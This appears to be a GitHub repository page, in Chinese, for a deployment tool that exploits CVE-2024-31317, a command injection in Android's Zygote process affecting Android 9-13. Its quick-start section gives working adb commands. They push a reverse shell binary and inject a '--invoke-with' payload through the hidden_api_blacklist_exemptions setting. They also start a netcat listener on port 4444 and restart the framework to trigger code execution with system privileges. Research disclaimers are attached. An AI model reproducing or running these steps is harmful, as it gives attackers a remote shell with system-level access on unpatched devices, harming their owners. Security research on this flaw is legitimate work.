Skip to content

fcy10012/CVE-2024-31317-Deployer

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2024-31317 Deployer

License Android Status

🔒 安全研究声明

本项目仅用于安全研究和教育目的。使用本工具进行未经授权的测试是非法的。作者不对任何滥用或损害负责。

📋 概述

CVE-2024-31317 是一个影响 Android 9 至 Android 13 设备的严重安全漏洞,允许具有 WRITE_SECURE_SETTINGS 权限的应用程序通过命令注入获得系统级权限执行。

本项目提供了该漏洞的详细技术分析、概念验证代码以及自动化部署工具。

✨ 主要特性

  • 📱 支持 Android 9-13 全版本
  • 🛠️ 自动化部署脚本
  • 🔄 反向 Shell 连接
  • 📊 详细的技术文档
  • 🎯 模块化设计

🐛 漏洞详情

  • CVE ID: CVE-2024-31317
  • 漏洞类型: 命令注入
  • 严重等级: 高危 (High)
  • CVSS 评分: 7.8
  • 影响组件: Android Zygote 进程
  • 修复状态: 已在 2024年6月 Android 安全补丁中修复

🎯 影响范围

受影响版本

  • ✅ Android 9-13

不受影响版本

  • ❌ Android 14+ (已修复)
  • ❌ 已安装 2024年6月 或更新安全补丁的设备

📁 项目结构

CVE-2024-31317-Deployer/
├── README.md
├── LICENSE
├── VULNERABILITY_ANALYSIS.md
├── reverse_shell.c
├── compile.sh
├── payloads/
├── scripts/
└── docs/

🚀 快速开始

1. 克隆项目

git clone https://github.com/fcy10012/CVE-2024-31317-Deployer.git
cd CVE-2024-31317-Deployer

2. 编译 Payload

chmod +x compile.sh
./compile.sh

3. 部署

# 启动监听器
nc -lvnp 4444

# 推送并执行
adb push bin/reverse_shell_arm64 /data/local/tmp/reverse_shell
adb shell chmod 755 /data/local/tmp/reverse_shell

# 注入payload
adb shell settings put global hidden_api_blacklist_exemptions "L*\n--invoke-with /data/local/tmp/reverse_shell 192.168.1.100 4444"

# 触发漏洞
adb shell stop && adb shell start

📚 文档

⚠️ 免责声明

本项目仅供安全研究和教育目的使用。使用本工具即表示您同意:

  • 遵守所有适用的法律法规
  • 仅用于合法的安全研究
  • 对您的行为负全部责任

📜 许可证

本项目采用 MIT 许可证 - 详见 LICENSE 文件

👨‍💻 作者

fcy10012 - GitHub

🙏 致谢

参考项目: WebLDix/CVE-2024-31317-PoC-Deployer


⭐ 如果这个项目对您有帮助,请给它一个星标!

About

CVE-2024-31317 Android Zygote命令注入漏洞研究与部署工具 | Android 9-13 漏洞利用框架

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors